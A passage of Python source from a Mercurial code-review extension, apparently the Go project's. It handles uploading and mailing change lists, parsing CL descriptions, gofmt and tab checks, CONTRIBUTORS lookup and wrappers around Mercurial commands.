    # set message for that purpose, but there is no message with
    # the first patch set. Instead the message gets used as the
    # new CL's overall subject. So omit the diffs when creating
    # and then we'll run an immediate upload.
    # This has the effect that every CL begins with an empty "Patch set 1".
    if self.files and not creating:
        vcs = MercurialVCS(upload_options, ui, repo)
        data = vcs.GenerateDiff(self.files)
        files = vcs.GetBaseFiles(data)
        if len(data) > MAX_UPLOAD_SIZE:
            # Too big for one request; patches go up one-by-one below.
            uploaded_diff_file = []
            form_fields.append(("separate_patches", "1"))
        else:
            uploaded_diff_file = [("data", "data.diff", data)]
    else:
        uploaded_diff_file = [("data", "data.diff", emptydiff)]
    if vcs and self.name != "new":
        form_fields.append(("subject", "diff -r " + vcs.base_rev + " " + ui.expandpath("default")))
    else:
        # First upload sets the subject for the CL itself.
        form_fields.append(("subject", self.Subject()))
    ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
    response_body = MySend("/upload", body, content_type=ctype)
    # Response format: status line, patchset id, then "id filename" pairs.
    patchset = None
    msg = response_body
    lines = msg.splitlines()
    if len(lines) >= 2:
        msg = lines[0]
        patchset = lines[1].strip()
        patches = [x.split(" ", 1) for x in lines[2:]]
    if response_body.startswith("Issue updated.") and quiet:
        pass
    else:
        ui.status(msg + "\n")
    set_status("uploaded CL metadata + diffs")
    if not response_body.startswith("Issue created.") and not response_body.startswith("Issue updated."):
        raise hg_util.Abort("failed to update issue: " + response_body)
    # The status line ends with the issue URL; take the trailing number.
    issue = msg[msg.rfind("/")+1:]
    self.name = issue
    if not self.url:
        self.url = server_url_base + self.name
    if not uploaded_diff_file:
        set_status("uploading patches")
        patches = UploadSeparatePatches(issue, rpc, patchset, data, upload_options)
    if vcs:
        set_status("uploading base files")
        vcs.UploadBaseFiles(issue, rpc, patches, patchset, upload_options, files)
    if send_mail:
        set_status("sending mail")
        MySend("/" + issue + "/mail", payload="")
    self.web = True
    set_status("flushing changes to disk")
    self.Flush(ui, repo)
    return
def Mail(self, ui, repo):
    # Send the review-request mail for this CL (first mail asks for a
    # review; later mails say "take another look"), then record that it
    # has been mailed.
    pmsg = "Hello " + JoinComma(self.reviewer)
    if self.cc:
        pmsg += " (cc: %s)" % (', '.join(self.cc),)
    pmsg += ",\n"
    pmsg += "\n"
    repourl = ui.expandpath("default")
    if not self.mailed:
        pmsg += "I'd like you to review this change to\n" + repourl + "\n"
    else:
        pmsg += "Please take another look.\n"
    typecheck(pmsg, str)
    PostMessage(ui, self.name, pmsg, subject=self.Subject())
    self.mailed = True
    self.Flush(ui, repo)
def GoodCLName(name):
    # Report whether name looks like a CL number (all decimal digits).
    # Returns the match object (truthy) or None, so callers can use it
    # directly in boolean context.
    typecheck(name, str)
    return re.match("^[0-9]+$", name)
def ParseCL(text, name):
    # Parse the editable CL text format (see EditorText) into a CL object.
    # Returns (cl, 0, '') on success or (None, lineno, errmsg) on failure.
    typecheck(text, str)
    typecheck(name, str)
    sname = None        # name of section currently being accumulated
    lineno = 0
    sections = {
        'Author': '',
        'Description': '',
        'Files': '',
        'URL': '',
        'Reviewer': '',
        'CC': '',
        'Mailed': '',
        'Private': '',
    }
    for line in text.split('\n'):
        lineno += 1
        line = line.rstrip()
        # Comment lines are ignored entirely.
        if line != '' and line[0] == '#':
            continue
        # Blank or indented lines continue the current section.
        if line == '' or line[0] == ' ' or line[0] == '\t':
            if sname == None and line != '':
                return None, lineno, 'text outside section'
            if sname != None:
                sections[sname] += line + '\n'
            continue
        # Otherwise this must be a "Name: [value]" section header.
        p = line.find(':')
        if p >= 0:
            s, val = line[:p].strip(), line[p+1:].strip()
            if s in sections:
                sname = s
                if val != '':
                    sections[sname] += val + '\n'
                continue
        return None, lineno, 'malformed section header'
    for k in sections:
        sections[k] = StripCommon(sections[k]).rstrip()
    cl = CL(name)
    if sections['Author']:
        cl.copied_from = sections['Author']
    cl.desc = sections['Description']
    for line in sections['Files'].split('\n'):
        # Strip trailing "# ..." comments from file entries.
        i = line.find('#')
        if i >= 0:
            line = line[0:i].rstrip()
        line = line.strip()
        if line == '':
            continue
        cl.files.append(line)
    cl.reviewer = SplitCommaSpace(sections['Reviewer'])
    cl.cc = SplitCommaSpace(sections['CC'])
    cl.url = sections['URL']
    if sections['Mailed'] != 'False':
        # Odd default, but avoids spurious mailings when
        # reading old CLs that do not have a Mailed: line.
        # CLs created with this update will always have
        # Mailed: False on disk.
        cl.mailed = True
    if sections['Private'] in ('True', 'true', 'Yes', 'yes'):
        cl.private = True
    # Drop the editor placeholder if the user left it in place.
    if cl.desc == '<enter description here>':
        cl.desc = ''
    return cl, 0, ''
def SplitCommaSpace(s):
    # Split a comma-separated list like "a, b,c" into ['a', 'b', 'c'].
    # An empty or all-whitespace string yields the empty list.
    typecheck(s, str)
    stripped = s.strip()
    if not stripped:
        return []
    return re.split(", *", stripped)
def CutDomain(s):
    # Strip an e-mail domain: "user@host" -> "user".  Strings without
    # an '@' are returned unchanged.
    typecheck(s, str)
    at = s.find('@')
    if at < 0:
        return s
    return s[:at]
def JoinComma(l):
    # Join a list of strings with ", ", verifying each element is a str.
    for item in l:
        typecheck(item, str)
    return ", ".join(l)
def ExceptionDetail():
    # Describe the exception currently being handled as "Type: message"
    # (or just "Type" if the exception has no message).
    etype, evalue = sys.exc_info()[:2]
    name = str(etype)
    # Unwrap both the old-style "<type 'X'>" and new-style "<class 'X'>"
    # spellings down to the bare type name "X".
    for prefix in ("<type '", "<class '"):
        if name.startswith(prefix) and name.endswith("'>"):
            name = name[len(prefix):-2]
            break
    detail = str(evalue)
    if detail:
        name += ": " + detail
    return name
def IsLocalCL(ui, repo, name):
    # Report whether a CL record named name exists in this repository's
    # .hg/codereview directory.
    return GoodCLName(name) and os.access(CodeReviewDir(ui, repo) + "/cl." + name, 0)
# Load CL from disk and/or the web.
def LoadCL(ui, repo, name, web=True):
    # Returns (cl, '') on success or (None, errmsg) on failure.
    # The on-disk record (if any) is read first; with web=True the
    # server's metadata is then merged on top of it.
    typecheck(name, str)
    set_status("loading CL " + name)
    if not GoodCLName(name):
        return None, "invalid CL name"
    dir = CodeReviewDir(ui, repo)
    path = dir + "cl." + name
    if os.access(path, 0):
        ff = open(path)
        text = ff.read()
        ff.close()
        cl, lineno, err = ParseCL(text, name)
        if err != "":
            return None, "malformed CL data: "+err
        cl.local = True
    else:
        cl = CL(name)
    if web:
        set_status("getting issue metadata from web")
        d = JSONGet(ui, "/api/" + name + "?messages=true")
        set_status(None)
        if d is None:
            return None, "cannot load CL %s from server" % (name,)
        # Sanity-check the server response before trusting it.
        if 'owner_email' not in d or 'issue' not in d or str(d['issue']) != name:
            return None, "malformed response loading CL data from code review server"
        cl.dict = d
        cl.reviewer = d.get('reviewers', [])
        cl.cc = d.get('cc', [])
        if cl.local and cl.copied_from and cl.desc:
            # local copy of CL written by someone else
            # and we saved a description. use that one,
            # so that committers can edit the description
            # before doing hg submit.
            pass
        else:
            cl.desc = d.get('description', "")
        cl.url = server_url_base + name
        cl.web = True
        cl.private = d.get('private', False) != False
        cl.lgtm = []
        # Collect approval ("LGTM") messages as (sender, first line).
        for m in d.get('messages', []):
            if m.get('approval', False) == True:
                who = re.sub('@.*', '', m.get('sender', ''))
                text = re.sub("\n(.|\n)*", '', m.get('text', ''))
                cl.lgtm.append((who, text))
    set_status("loaded CL " + name)
    return cl, ''
class LoadCLThread(threading.Thread):
    # Worker thread used by LoadAllCL to load CL records in parallel.
    # After join(), the result is in self.cl (None if loading failed).
    def __init__(self, ui, repo, dir, f, web):
        threading.Thread.__init__(self)
        self.ui = ui
        self.repo = repo
        self.dir = dir
        self.f = f          # file name of the form "cl.<number>"
        self.web = web
        self.cl = None
    def run(self):
        # f[3:] strips the "cl." prefix to recover the CL number.
        cl, err = LoadCL(self.ui, self.repo, self.f[3:], web=self.web)
        if err != '':
            self.ui.warn("loading "+self.dir+self.f+": " + err + "\n")
            return
        self.cl = cl
# Load all the CLs from this repository.
def LoadAllCL(ui, repo, web=True):
    # Returns a dict mapping CL name -> CL, loading records concurrently.
    dir = CodeReviewDir(ui, repo)
    m = {}
    files = [f for f in os.listdir(dir) if f.startswith('cl.')]
    if not files:
        return m
    active = []
    first = True
    for f in files:
        t = LoadCLThread(ui, repo, dir, f, web)
        t.start()
        if web and first:
            # first request: wait in case it needs to authenticate
            # otherwise we get lots of user/password prompts
            # running in parallel.
            t.join()
            if t.cl:
                m[t.cl.name] = t.cl
            first = False
        else:
            active.append(t)
    # Harvest the remaining threads.
    for t in active:
        t.join()
        if t.cl:
            m[t.cl.name] = t.cl
    return m
# Find repository root. On error, ui.warn and return None
def RepoDir(ui, repo):
    # Only local (file:) repositories are supported; the returned path
    # has no trailing slash.
    url = repo.url();
    if not url.startswith('file:'):
        ui.warn("repository %s is not in local file system\n" % (url,))
        return None
    url = url[5:]       # strip "file:" scheme
    if url.endswith('/'):
        url = url[:-1]
    typecheck(url, str)
    return url
# Find (or make) code review directory. On error, ui.warn and return None
def CodeReviewDir(ui, repo):
    # Returns "<repo root>/.hg/codereview/" (with trailing slash),
    # creating the directory on first use.
    dir = RepoDir(ui, repo)
    if dir == None:
        return None
    dir += '/.hg/codereview/'
    if not os.path.isdir(dir):
        try:
            # 0700: CL records may mention private issues; owner-only.
            os.mkdir(dir, 0700)
        except:
            ui.warn('cannot mkdir %s: %s\n' % (dir, ExceptionDetail()))
            return None
    typecheck(dir, str)
    return dir
# Turn leading tabs into spaces, so that the common white space
# prefix doesn't get confused when people's editors write out
# some lines with spaces, some with tabs.  Only a heuristic
# (some editors don't use 8 spaces either) but a useful one.
def TabsToSpaces(line):
    # Expand only the run of tabs at the start of line, 8 spaces each;
    # tabs later in the line are left alone.
    body = line.lstrip('\t')
    ntabs = len(line) - len(body)
    return ' ' * (8 * ntabs) + body
# Strip maximal common leading white space prefix from text
def StripCommon(text):
    # Two passes: first compute the longest whitespace prefix shared by
    # all non-blank lines (after tab expansion), then strip it.
    typecheck(text, str)
    ws = None
    for line in text.split('\n'):
        line = line.rstrip()
        if line == '':
            continue
        line = TabsToSpaces(line)
        # white = the leading whitespace of this line.
        white = line[:len(line)-len(line.lstrip())]
        if ws == None:
            ws = white
        else:
            # Shrink ws to the longest prefix it shares with white.
            common = ''
            for i in range(min(len(white), len(ws))+1):
                if white[0:i] == ws[0:i]:
                    common = white[0:i]
            ws = common
        if ws == '':
            break
    if ws == None:
        return text
    t = ''
    for line in text.split('\n'):
        line = line.rstrip()
        line = TabsToSpaces(line)
        if line.startswith(ws):
            line = line[len(ws):]
        # Drop leading blank lines.
        if line == '' and t == '':
            continue
        t += line + '\n'
    # Collapse any trailing run of newlines to a single one.
    while len(t) >= 2 and t[-2:] == '\n\n':
        t = t[:-1]
    typecheck(t, str)
    return t
# Indent text with indent.
def Indent(text, indent):
    # Prefix every line of text with indent; each line (including a
    # trailing empty one produced by split) gains a terminating newline.
    typecheck(text, str)
    typecheck(indent, str)
    out = ''.join(indent + line + '\n' for line in text.split('\n'))
    typecheck(out, str)
    return out
# Return the first line of l
def line1(text):
    # Everything before the first newline (the whole string if none).
    typecheck(text, str)
    return text.partition('\n')[0]
# Boilerplate placed at the top of the editable CL form.
_change_prolog = """# Change list.
# Lines beginning with # are ignored.
# Multi-line values should be indented.
"""

# Regexp a conventional first description line must match:
# "pkg: summary", a release/weekly tag, "fix build", or "undo CL".
desc_re = '^(.+: |(tag )?(release|weekly)\.|fix build|undo CL)'

# Warning shown when the description does not match desc_re.
# NOTE(review): indentation/blank lines inside this literal may have been
# lost in extraction — confirm against the original file before reuse.
desc_msg = '''Your CL description appears not to use the standard form.
The first line of your change description is conventionally a
one-line summary of the change, prefixed by the primary affected package,
and is used as the subject for code review mail; the rest of the description
elaborates.
Examples:
encoding/rot13: new package
math: add IsInf, IsNaN
net: fix cname in LookupHost
unicode: update to Unicode 5.0.2
'''
def promptyesno(ui, msg):
    # Ask the user a yes/no question; default (index 0) is yes.
    return ui.promptchoice(msg, ["&yes", "&no"], 0) == 0
def promptremove(ui, repo, f):
    # Offer to "hg remove" a file that was deleted from the working tree.
    if promptyesno(ui, "hg remove %s (y/n)?" % (f,)):
        if hg_commands.remove(ui, repo, 'path:'+f) != 0:
            ui.warn("error removing %s" % (f,))
def promptadd(ui, repo, f):
    # Offer to "hg add" a file that hg does not yet track.
    if promptyesno(ui, "hg add %s (y/n)?" % (f,)):
        if hg_commands.add(ui, repo, 'path:'+f) != 0:
            ui.warn("error adding %s" % (f,))
def EditCL(ui, repo, cl):
    # Open cl in the user's editor, re-parse and validate the result,
    # looping until the text is acceptable or the user gives up.
    # Returns "" on success or an error/abort message.
    set_status(None)  # do not show status
    s = cl.EditorText()
    while True:
        s = ui.edit(s, ui.username())

        # We can't trust Mercurial + Python not to die before making the change,
        # so, by popular demand, just scribble the most recent CL edit into
        # $(hg root)/last-change so that if Mercurial does die, people
        # can look there for their work.
        try:
            f = open(repo.root+"/last-change", "w")
            f.write(s)
            f.close()
        except:
            pass

        clx, line, err = ParseCL(s, cl.name)
        if err != '':
            if not promptyesno(ui, "error parsing change list: line %d: %s\nre-edit (y/n)?" % (line, err)):
                return "change list not modified"
            continue

        # Check description.
        if clx.desc == '':
            if promptyesno(ui, "change list should have a description\nre-edit (y/n)?"):
                continue
        elif re.search('<enter reason for undo>', clx.desc):
            if promptyesno(ui, "change list description omits reason for undo\nre-edit (y/n)?"):
                continue
        elif not re.match(desc_re, clx.desc.split('\n')[0]):
            if promptyesno(ui, desc_msg + "re-edit (y/n)?"):
                continue

        # Check file list for files that need to be hg added or hg removed
        # or simply aren't understood.
        pats = ['path:'+f for f in clx.files]
        changed = hg_matchPattern(ui, repo, *pats, modified=True, added=True, removed=True)
        deleted = hg_matchPattern(ui, repo, *pats, deleted=True)
        unknown = hg_matchPattern(ui, repo, *pats, unknown=True)
        ignored = hg_matchPattern(ui, repo, *pats, ignored=True)
        clean = hg_matchPattern(ui, repo, *pats, clean=True)
        files = []
        for f in clx.files:
            if f in changed:
                files.append(f)
                continue
            if f in deleted:
                promptremove(ui, repo, f)
                files.append(f)
                continue
            if f in unknown:
                promptadd(ui, repo, f)
                files.append(f)
                continue
            if f in ignored:
                ui.warn("error: %s is excluded by .hgignore; omitting\n" % (f,))
                continue
            if f in clean:
                ui.warn("warning: %s is listed in the CL but unchanged\n" % (f,))
                files.append(f)
                continue
            # Not known to hg at all; classify by what is on disk.
            p = repo.root + '/' + f
            if os.path.isfile(p):
                ui.warn("warning: %s is a file but not known to hg\n" % (f,))
                files.append(f)
                continue
            if os.path.isdir(p):
                ui.warn("error: %s is a directory, not a file; omitting\n" % (f,))
                continue
            ui.warn("error: %s does not exist; omitting\n" % (f,))
        clx.files = files

        # Copy the validated edit back into the caller's CL.
        cl.desc = clx.desc
        cl.reviewer = clx.reviewer
        cl.cc = clx.cc
        cl.files = clx.files
        cl.private = clx.private
        break
    return ""
# For use by submit, etc. (NOT by change)
# Get change list number or list of files from command line.
# If files are given, make a new change list.
def CommandLineCL(ui, repo, pats, opts, defaultcc=None):
    # Returns (cl, "") on success or (None, errmsg) on failure.
    if len(pats) > 0 and GoodCLName(pats[0]):
        # First argument is an existing CL number.
        if len(pats) != 1:
            return None, "cannot specify change number and file names"
        if opts.get('message'):
            return None, "cannot use -m with existing CL"
        cl, err = LoadCL(ui, repo, pats[0], web=True)
        if err != "":
            return None, err
    else:
        # Build a fresh CL from the changed files matching pats.
        cl = CL("new")
        cl.local = True
        cl.files = ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
        if not cl.files:
            return None, "no files changed"
    if opts.get('reviewer'):
        cl.reviewer = Add(cl.reviewer, SplitCommaSpace(opts.get('reviewer')))
    if opts.get('cc'):
        cl.cc = Add(cl.cc, SplitCommaSpace(opts.get('cc')))
    if defaultcc:
        cl.cc = Add(cl.cc, defaultcc)
    if cl.name == "new":
        if opts.get('message'):
            cl.desc = opts.get('message')
        else:
            err = EditCL(ui, repo, cl)
            if err != '':
                return None, err
    return cl, ""
#######################################################################
# Change list file management

# Return list of changed files in repository that match pats.
# The patterns came from the command line, so we warn
# if they have no effect or cannot be understood.
def ChangedFiles(ui, repo, pats, taken=None):
    # taken maps file -> CL for files already claimed by another CL.
    taken = taken or {}
    # Run each pattern separately so that we can warn about
    # patterns that didn't do anything useful.
    for p in pats:
        for f in hg_matchPattern(ui, repo, p, unknown=True):
            promptadd(ui, repo, f)
        for f in hg_matchPattern(ui, repo, p, removed=True):
            promptremove(ui, repo, f)
        files = hg_matchPattern(ui, repo, p, modified=True, added=True, removed=True)
        for f in files:
            if f in taken:
                ui.warn("warning: %s already in CL %s\n" % (f, taken[f].name))
        if not files:
            ui.warn("warning: %s did not match any modified files\n" % (p,))
    # Again, all at once (eliminates duplicates)
    l = hg_matchPattern(ui, repo, *pats, modified=True, added=True, removed=True)
    l.sort()
    if taken:
        l = Sub(l, taken.keys())
    return l
# Return list of changed files in repository that match pats and still exist.
def ChangedExistingFiles(ui, repo, pats, opts):
    # Only modified/added files are queried (not removed), so every
    # returned path still exists in the working directory.
    return sorted(hg_matchPattern(ui, repo, *pats, modified=True, added=True))
# Return list of files claimed by existing CLs
def Taken(ui, repo):
    # Map each file listed in some local CL record to that CL object.
    claimed = {}
    for cl in LoadAllCL(ui, repo, web=False).values():
        for f in cl.files:
            claimed[f] = cl
    return claimed
# Return list of changed files that are not claimed by other CLs
def DefaultFiles(ui, repo, pats):
    return ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
#######################################################################
# File format checking.

def CheckFormat(ui, repo, files, just_warn=False):
    # Run all format checks (gofmt for Go files, tab indentation for
    # C/header/assembly files) over files before upload/submit.
    set_status("running gofmt")
    CheckGofmt(ui, repo, files, just_warn)
    CheckTabfmt(ui, repo, files, just_warn)
# Check that gofmt run on the list of files does not change them
def CheckGofmt(ui, repo, files, just_warn):
    # Only .go files are checked; test/ data files are skipped except
    # for test/bench/.
    files = [f for f in files if (not f.startswith('test/') or f.startswith('test/bench/')) and f.endswith('.go')]
    if not files:
        return
    cwd = os.getcwd()
    files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
    files = [f for f in files if os.access(f, 0)]
    if not files:
        return
    try:
        # gofmt -l prints the names of files whose formatting would change.
        cmd = subprocess.Popen(["gofmt", "-l"] + files, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=sys.platform != "win32")
        cmd.stdin.close()
    except:
        raise hg_util.Abort("gofmt: " + ExceptionDetail())
    # NOTE(review): reading stdout fully before stderr can deadlock if
    # gofmt fills the stderr pipe buffer; communicate() would be safer —
    # confirm before relying on this with very large error output.
    data = cmd.stdout.read()
    errors = cmd.stderr.read()
    cmd.wait()
    set_status("done with gofmt")
    if len(errors) > 0:
        ui.warn("gofmt errors:\n" + errors.rstrip() + "\n")
        return
    if len(data) > 0:
        msg = "gofmt needs to format these files (run hg gofmt):\n" + Indent(data, "\t").rstrip()
        if just_warn:
            ui.warn("warning: " + msg + "\n")
        else:
            raise hg_util.Abort(msg)
    return
# Check that *.[chys] files indent using tabs.
def CheckTabfmt(ui, repo, files, just_warn):
    # Only C, header, assembly, and yacc sources under src/ are checked.
    files = [f for f in files if f.startswith('src/') and re.search(r"\.[chys]$", f)]
    if not files:
        return
    cwd = os.getcwd()
    files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
    files = [f for f in files if os.access(f, 0)]
    badfiles = []
    for f in files:
        try:
            for line in open(f, 'r'):
                # Four leading spaces is enough to complain about,
                # except that some Plan 9 code uses four spaces as the label indent,
                # so allow that.
                # NOTE(review): the comment says "four spaces" but the string
                # literals below appear to contain a single space — leading
                # whitespace may have been lost in extraction; confirm against
                # the original file.
                if line.startswith(' ') and not re.match(' [A-Za-z0-9_]+:', line):
                    badfiles.append(f)
                    break
        except:
            # ignore cannot open file, etc.
            pass
    if len(badfiles) > 0:
        msg = "these files use spaces for indentation (use tabs instead):\n\t" + "\n\t".join(badfiles)
        if just_warn:
            ui.warn("warning: " + msg + "\n")
        else:
            raise hg_util.Abort(msg)
    return
#######################################################################
# CONTRIBUTORS file parsing

# Maps lowercased e-mail address -> (name, canonical e-mail).
contributors = {}

def ReadContributors(ui, repo):
    # Populate the module-level contributors map from the repository's
    # CONTRIBUTORS file; on failure just warn and leave it empty.
    global contributors
    try:
        f = open(repo.root + '/CONTRIBUTORS', 'r')
    except:
        ui.write("warning: cannot open %s: %s\n" % (repo.root+'/CONTRIBUTORS', ExceptionDetail()))
        return
    for line in f:
        # CONTRIBUTORS is a list of lines like:
        #	Person <email>
        #	Person <email> <alt-email>
        # The first email address is the one used in commit logs.
        if line.startswith('#'):
            continue
        m = re.match(r"([^<>]+\S)\s+(<[^<>\s]+>)((\s+<[^<>\s]+>)*)\s*$", line)
        if m:
            name = m.group(1)
            email = m.group(2)[1:-1]
            contributors[email.lower()] = (name, email)
            # Alternate addresses map to the same canonical identity.
            for extra in m.group(3).split():
                contributors[extra[1:-1].lower()] = (name, email)
def CheckContributor(ui, repo, user=None):
    # Like FindContributor but aborts if user is not in CONTRIBUTORS.
    # Returns the canonical "Name <email>" line.
    set_status("checking CONTRIBUTORS file")
    user, userline = FindContributor(ui, repo, user, warn=False)
    if not userline:
        raise hg_util.Abort("cannot find %s in CONTRIBUTORS" % (user,))
    return userline
def FindContributor(ui, repo, user=None, warn=True):
    # Look user (or the configured ui.username) up in the contributors
    # map.  Returns (email, "Name <email>") on success or
    # (normalized-user, None) when unknown.
    if not user:
        user = ui.config("ui", "username")
        if not user:
            raise hg_util.Abort("[ui] username is not configured in .hgrc")
    user = user.lower()
    # Accept "Name <addr>" form and reduce it to the bare address.
    m = re.match(r".*<(.*)>", user)
    if m:
        user = m.group(1)
    if user not in contributors:
        if warn:
            ui.warn("warning: cannot find %s in CONTRIBUTORS\n" % (user,))
        return user, None
    user, email = contributors[user]
    return email, "%s <%s>" % (user, email)
#######################################################################
# Mercurial helper functions.
# Read http://mercurial.selenic.com/wiki/MercurialApi before writing any of these.
# We use the ui.pushbuffer/ui.popbuffer + hg_commands.xxx tricks for all interaction
# with Mercurial. It has proved the most stable as they make changes.

hgversion = hg_util.version()

# We require Mercurial 1.9 and suggest Mercurial 2.0.
# The details of the scmutil package changed then,
# so allowing earlier versions would require extra band-aids below.
# Ubuntu 11.10 ships with Mercurial 1.9.1 as the default version.
hg_required = "1.9"
hg_suggested = "2.0"

old_message = """
The code review extension requires Mercurial """+hg_required+""" or newer.
You are using Mercurial """+hgversion+""".
To install a new Mercurial, use
sudo easy_install mercurial=="""+hg_suggested+"""
or visit http://mercurial.selenic.com/downloads/.
"""

linux_message = """
You may need to clear your current Mercurial installation by running:
sudo apt-get remove mercurial mercurial-common
sudo rm -rf /etc/mercurial
"""

# NOTE(review): this is a lexicographic string comparison, so e.g.
# "1.10" < "1.9" would compare as older — acceptable for the 1.x/2.x
# versions in use here, but confirm before relying on it more broadly.
if hgversion < hg_required:
    msg = old_message
    if os.access("/etc/mercurial", 0):
        msg += linux_message
    raise hg_util.Abort(msg)
from mercurial.hg import clean as hg_clean
from mercurial import cmdutil as hg_cmdutil
from mercurial import error as hg_error
from mercurial import match as hg_match
from mercurial import node as hg_node
class uiwrap(object):
    # Capture Mercurial command output: construction pushes a ui buffer
    # and silences quiet/verbose; output() restores the flags and returns
    # everything the wrapped command wrote.
    def __init__(self, ui):
        self.ui = ui
        ui.pushbuffer()
        self.oldQuiet = ui.quiet
        ui.quiet = True
        self.oldVerbose = ui.verbose
        ui.verbose = False
    def output(self):
        # Restore the saved flags and pop the captured text.
        ui = self.ui
        ui.quiet = self.oldQuiet
        ui.verbose = self.oldVerbose
        return ui.popbuffer()
def to_slash(path):
    # Normalize Windows backslash separators to forward slashes; on
    # every other platform the path is returned untouched.
    if sys.platform != "win32":
        return path
    return path.replace('\\', '/')
def hg_matchPattern(ui, repo, *pats, **opts):
    # Run "hg status" with the given patterns/flags and return the list
    # of matching file paths, relative to the repository root.
    w = uiwrap(ui)
    hg_commands.status(ui, repo, *pats, **opts)
    text = w.output()
    ret = []
    prefix = to_slash(os.path.realpath(repo.root))+'/'
    for line in text.split('\n'):
        # Each status line is "<flag> <path>".
        f = line.split()
        if len(f) > 1:
            if len(pats) > 0:
                # Given patterns, Mercurial shows relative to cwd
                p = to_slash(os.path.realpath(f[1]))
                if not p.startswith(prefix):
                    print >>sys.stderr, "File %s not in repo root %s.\n" % (p, prefix)
                else:
                    ret.append(p[len(prefix):])
            else:
                # Without patterns, Mercurial shows relative to root (what we want)
                ret.append(to_slash(f[1]))
    return ret
def hg_heads(ui, repo):
    # Run "hg heads" and return its captured output; abort on a non-zero
    # return value.
    w = uiwrap(ui)
    ret = hg_commands.heads(ui, repo)
    if ret:
        raise hg_util.Abort(ret)
    return w.output()
# Mercurial status lines considered uninteresting chatter; suppressed
# by hg_pull/hg_push via isNoise.
noise = [
    "",
    "resolving manifests",
    "searching for changes",
    "couldn't find merge tool hgmerge",
    "adding changesets",
    "adding manifests",
    "adding file changes",
    "all local heads known remotely",
]
def isNoise(line):
    # Report whether line is one of the known uninteresting Mercurial
    # status lines listed in noise.
    return str(line) in noise
def hg_incoming(ui, repo):
    # Run "hg incoming" and return its captured output.  Return value 1
    # means "no incoming changes" and is not an error.
    w = uiwrap(ui)
    ret = hg_commands.incoming(ui, repo, force=False, bundle="")
    if ret and ret != 1:
        raise hg_util.Abort(ret)
    return w.output()
def hg_log(ui, repo, **opts):
    # Run "hg log" and return its captured output.  hg_commands.log
    # requires these keys to be present, so default missing ones to "".
    for k in ['date', 'keyword', 'rev', 'user']:
        if not opts.has_key(k):
            opts[k] = ""
    w = uiwrap(ui)
    ret = hg_commands.log(ui, repo, **opts)
    if ret:
        raise hg_util.Abort(ret)
    return w.output()
def hg_outgoing(ui, repo, **opts):
    # Run "hg outgoing" and return its captured output.  Return value 1
    # means "no outgoing changes" and is not an error.
    w = uiwrap(ui)
    ret = hg_commands.outgoing(ui, repo, **opts)
    if ret and ret != 1:
        raise hg_util.Abort(ret)
    return w.output()
def hg_pull(ui, repo, **opts):
    # Run "hg pull", rewriting its verbose per-file output into a terse
    # "mv/+/-" listing and dropping known noise lines.
    w = uiwrap(ui)
    ui.quiet = False
    ui.verbose = True  # for file list
    err = hg_commands.pull(ui, repo, **opts)
    for line in w.output().split('\n'):
        if isNoise(line):
            continue
        # Deliberately sequential ifs, not elif: once a line has been
        # rewritten its prefix no longer matches the later patterns.
        if line.startswith('moving '):
            line = 'mv ' + line[len('moving '):]
        if line.startswith('getting ') and line.find(' to ') >= 0:
            line = 'mv ' + line[len('getting '):]
        if line.startswith('getting '):
            line = '+ ' + line[len('getting '):]
        if line.startswith('removing '):
            line = '- ' + line[len('removing '):]
        ui.write(line + '\n')
    return err
def hg_push(ui, repo, **opts):
    # Run "hg push", echoing its verbose output minus known noise lines.
    w = uiwrap(ui)
    ui.quiet = False
    ui.verbose = True
    err = hg_commands.push(ui, repo, **opts)
    for line in w.output().split('\n'):
        if not isNoise(line):
            ui.write(line + '\n')
    return err
def hg_commit(ui, repo, *pats, **opts):
    # Thin pass-through to "hg commit"; kept as a helper for symmetry
    # with the other hg_* wrappers.
    return hg_commands.commit(ui, repo, *pats, **opts)
#######################################################################
# Mercurial precommit hook to disable commit except through this interface.

# Set to True by the extension's own commit paths so the hook lets the
# commit through.
commit_okay = False

def precommithook(ui, repo, **opts):
    # Mercurial hook convention: returning False allows the commit,
    # True blocks it.
    if commit_okay:
        return False  # False means okay.
    ui.write("\ncodereview extension enabled; use mail, upload, or submit instead of commit\n\n")
    return True
#######################################################################
# @clnumber file pattern support

# We replace scmutil.match with the MatchAt wrapper to add the @clnumber pattern.

# Saved state for MatchAt: the ui/repo to resolve @clnumber patterns
# against, and the original scmutil.match being wrapped.
match_repo = None
match_ui = None
match_orig = None

def InstallMatch(ui, repo):
    # Monkey-patch scmutil.match with MatchAt so that file patterns of
    # the form @<clnumber> expand to the files of that CL.
    global match_repo
    global match_ui
    global match_orig
    match_ui = ui
    match_repo = repo
    from mercurial import scmutil
    match_orig = scmutil.match
    scmutil.match = MatchAt
def MatchAt(ctx, pats=None, opts=None, globbed=False, default='relpath'):
    # Replacement for scmutil.match (installed by InstallMatch): expands
    # "@<clnumber>" / "@default" patterns into explicit path: patterns
    # for the files of that CL, then delegates to the original matcher.
    taken = []
    files = []
    pats = pats or []
    opts = opts or {}
    for p in pats:
        if p.startswith('@'):
            taken.append(p)
            clname = p[1:]
            if clname == "default":
                # @default: all changed files not claimed by another CL.
                files = DefaultFiles(match_ui, match_repo, [])
            else:
                if not GoodCLName(clname):
                    raise hg_util.Abort("invalid CL name " + clname)
                cl, err = LoadCL(match_repo.ui, match_repo, clname, web=False)
                if err != '':
                    raise hg_util.Abort("loading CL " + clname + ": " + err)
                if not cl.files:
                    raise hg_util.Abort("no files in CL " + clname)
                files = Add(files, cl.files)
    # Replace the @-patterns with explicit path: patterns.
    pats = Sub(pats, taken) + ['path:'+f for f in files]

    # work-around for http://selenic.com/hg/rev/785bbc8634f8
    if not hasattr(ctx, 'match'):
        ctx = ctx[None]
    return match_orig(ctx, pats=pats, opts=opts, globbed=globbed, default=default)
#######################################################################
# Commands added by code review extension.

#######################################################################
# hg change

def change(ui, repo, *pats, **opts):
    """create, edit or delete a change list

    Create, edit or delete a change list.
    A change list is a group of files to be reviewed and submitted together,
    plus a textual description of the change.
    Change lists are referred to by simple alphanumeric names.
    Changes must be reviewed before they can be submitted.

    In the absence of options, the change command opens the
    change list for editing in the default editor.

    Deleting a change with the -d or -D flag does not affect
    the contents of the files listed in that change. To revert
    the files listed in a change, use

        hg revert @123456

    before running hg change -d 123456.
    """
    if codereview_disabled:
        return codereview_disabled

